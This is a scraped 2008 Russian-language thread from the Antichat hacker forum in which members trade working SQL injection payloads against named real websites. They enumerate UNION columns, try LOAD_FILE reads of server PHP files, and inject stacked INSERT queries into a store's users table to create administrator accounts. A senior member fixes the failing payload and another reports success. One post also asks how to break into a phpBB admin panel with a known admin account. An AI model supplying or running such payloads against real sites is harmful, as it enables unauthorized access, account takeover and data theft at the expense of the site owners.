Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
15.04.2008, 05:15
|
|
Постоянный
Регистрация: 26.12.2007
Сообщений: 353
Провел на форуме:
905389
Репутация:
332
|
|
Скажите я могу читать или писать файлы на сервере MYSql 4 ветки:
http://192.168.2.100/stats/map.php?id=1+and+substring(version(),1,1)=4
выполняется
http://192.168.2.100/stats/map.php?id=1+limit+5+union+select+1,2,3,4,5,6,7,8, 9,10,11,concat(version(),"%20",database(),"%20",SE SSION_USER()),13,14,15,16,17/*
как читать писать в файл зная дирикторию... но к сожелению не знаю права на папки.... и можноли тут изменять таблицу
Есть ли что то типа database() но выводящее где база находится я имею ввиду IP....
еще вот такая ситуация :
подобрал столбцы 12 столбец выводится как текст:
Код:
http://192.168.2.100/stats/map.php?id=1+limit+5+union+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
а вот это выводит без ошибок но там где выводится 12 столбец пусто....
Код:
http://192.168.2.100/stats/map.php?id=1+limit+5+union+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,LOAD_FILE('/var/www/html/stats/includes/class_db.php'),13,14,15,16,17/*
так же заместо loadfile вставляю CASE+WHEN+(1=1)+THEN+'A'+ELSE+'B'+END работает выводит А
привожу дополнительные сведения о SQL:
версия sql 4.0.20
Имя юзера gamecs@localhost
имя базы ps_stats
как я понял из session_user то запросы выполняются под gamecs@localhost жду помощи... +++
Последний раз редактировалось KIR@PRO; 15.04.2008 в 06:28..
|
|
|
15.04.2008, 14:48
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Велемир, ты написал полную ересь, причем поправлять тебя смысла нет, т.к. ересь почти во всем твоем посте
__________________
Карфаген должен быть разрушен...
|
|
|
|
15.04.2008, 16:30
|
|
Познающий
Регистрация: 12.02.2008
Сообщений: 90
Провел на форуме:
535943
Репутация:
20
|
|
Вообщем форум phpBB я знаю акк админа но в админку нельзя поапасть т.к. требует акк и пароль вваести(админские неподходят) можно ли как нибуть зайти в админку? или сделать дамп без входа в админку?
|
|
|
|
15.04.2008, 16:36
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Rogun
Привязка по IP возможно
|
|
|
|
15.04.2008, 16:59
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
При запросе http://www.countryman.com/store/product.asp?id=1;+insert+into+users(UserID,Admin,U serName,Password)+values(2,1,'tratata','gangsta')--
Выдаёт ошибку:
[Microsoft][ODBC SQL Server Driver][SQL Server]Cannot insert explicit value for identity column in table 'USERS' when IDENTITY_INSERT is set to OFF
Мне страшно о_О...
|
|
|
|
15.04.2008, 17:29
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
IDENTITY_INSERT отключен для UserID т.е. ты не можешь вставлять туда значения вручную, пробуй без нее:
http://www.countryman.com/store/product.asp?id=1;+insert+into+users(Admin,U serName,Password)+values(1,'tratata','gangsta')--
__________________
Карфаген должен быть разрушен...
|
|
|
|
15.04.2008, 17:45
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Няяяя,пасибки:Р.Щас тоже попробывал добавить,всё получилось!) (*Пошёл прыгать с абрыва*)
|
|
|
|
15.04.2008, 17:49
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
http://www.countryman.com/store/product.asp?id=1;+insert+into+users(UserName,Admin ,Password)+values('Welka','1','realkilla')--
Чойто не фкурил. Ввёл 2 раза неверно, и уже типо аблом -
http://www.countryman.com/admin/
You have exceeded the maximum
allowed log in attempts.
Тобишь всё должно быть верно о_О,но не пустило
|
|
|
|
15.04.2008, 17:52
|
|
Участник форума
Регистрация: 22.05.2006
Сообщений: 232
Провел на форуме:
561037
Репутация:
73
|
|
хелп
http://kharkov.nezabarom.com.ua/events/Devushki-nebav-samolet!/?page=-1
http://kharkov.nezabarom.com.ua/events/Devushki-nebav-samolet!/?page=7+UNION+SELECT+1,2,3,4,5,6,7,8,9,10/*
плин даже выводимы поля получить не могу, наверна юнион запрос скорей всего чото не выполняется, тока почему?
Последний раз редактировалось Shred; 15.04.2008 в 18:00..
|
|
|
|
15.04.2008, 18:17
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Велемир, это походу не от админки, или мож ты в поле Admin не те данные инзертишь
а вот здесь:_http://www.countryman.com/dealers/default.asp нормально авторизовывает
Shred, инъекция после limit при наличии order by, ничего не сделаешь
__________________
Карфаген должен быть разрушен...
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
